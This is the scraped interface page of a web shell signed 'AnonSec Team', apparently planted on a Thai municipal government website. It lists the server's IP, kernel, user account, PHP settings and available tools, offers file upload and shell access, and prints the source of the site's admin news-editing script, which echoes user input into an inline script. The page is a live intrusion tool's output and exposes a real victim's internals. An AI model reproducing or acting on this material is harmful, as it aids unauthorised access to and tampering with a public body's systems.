Ng1ndex !

NG1NDEX

Server IP : 103.233.192.212 / Your IP : 3.141.42.23
Web Server : Apache/2
System : Linux sv1.inde.co.th 3.10.0-1160.36.2.el7.x86_64 #1 SMP Wed Jul 21 11:57:15 UTC 2021 x86_64
User : sumpatuan ( 1058)
PHP Version : 5.5.38
Disable Function : symlink,shell_exec,exec,proc_close,proc_open,popen,system,dl,putenv,passthru,escapeshellarg,escapeshellcmd,pcntl_exec,proc_get_status,proc_nice,proc_terminate,pclose,ini_alter,virtual,openlog,ini_restore
MySQL : ON | cURL : ON | WGET : OFF | Perl : OFF | Python : OFF | Sudo : OFF | Pkexec : OFF
Directory : /home/sumpatuan/domains/sumpatuan.go.th/private_html/admin/new/action/

Upload File :

[ HOME SHELL ]

Current File : /home/sumpatuan/domains/sumpatuan.go.th/private_html/admin/new/action/save-News-edit.php

<?php
require_once('session_backend_administrator.php');
header('Content-Type: text/html; charset=UTF-8');
date_default_timezone_set("Asia/Bangkok"); 
$datetime = date('d/m/Y H.i'); 



if($STT_login=="admin_login_true"){

    if( !isset($_POST['edt_id']) or !isset($_POST['edt_name']) or !isset($_POST['edt_year']) or !isset($_POST['edt_type']) or !isset($_POST['edt_date']) ){
        echo "<SCRIPT type='text/javascript'>
                alert('กรุณากรอกข้อมูลให้ครบ');
                window.location.replace(document.referrer);
            </SCRIPT>";
        exit;
    }else{
        $data_idnew = $con_db_administrator->real_escape_string($_POST['edt_id']);
        $data_namenew = trim($con_db_administrator->real_escape_string($_POST['edt_name']));
        $data_yearnew = trim($con_db_administrator->real_escape_string($_POST['edt_year']));
        $data_typenew = $con_db_administrator->real_escape_string($_POST['edt_type']);
        $data_subtypenew = $con_db_administrator->real_escape_string($_POST['edt_subtype']);
        $data_datenew = date("d/m/Y",strtotime($_POST['edt_date']));
        $data_new = $con_db_administrator->real_escape_string($_POST['edt_data']);
    
        $data_sttnew = $con_db_administrator->real_escape_string($_POST['statusshow']);
        $data_linknew = $con_db_administrator->real_escape_string($_POST['linknew']);
        $lastupdate_new = $datetime;
        
            /////// UPDATE DATA to SQL
            $ud_data = " UPDATE `data_new` SET `name_new`='$data_namenew', `year_new`='$data_yearnew', `subtype_new`='$data_subtypenew', `date_new`='$data_datenew', `data_new`='$data_new', `stt_new`='$data_sttnew' , `lastupdate_new`='$lastupdate_new' 
                        WHERE `id_new`='$data_idnew' AND `type_new`='$data_typenew' ";  
            $action_ud_data = $con_db_administrator->query($ud_data);
            if(!$action_ud_data){
                echo "<SCRIPT type='text/javascript'>
                        alert('เกิดข้อผิดพลาด! แก้ไขข้อมูลไม่สำเร็จ');
                        window.location.replace(document.referrer);
                    </SCRIPT>";
                exit;
            }else{

                echo "<SCRIPT type='text/javascript'>
                        alert('แก้ไขข้อมูล [ $data_namenew ] สำเร็จ');
                        window.location.replace(document.referrer);
                    </SCRIPT>";
                exit;
            }
            
    }

}else{
    echo "<SCRIPT type='text/javascript'>
        alert('กรุณาเข้าสู่ระบบ');
        window.location.replace('../../index');
    </SCRIPT>";
    exit;
}
mysqli_close($con_db_administrator);
?>

Anon7 - 2022
AnonSec Team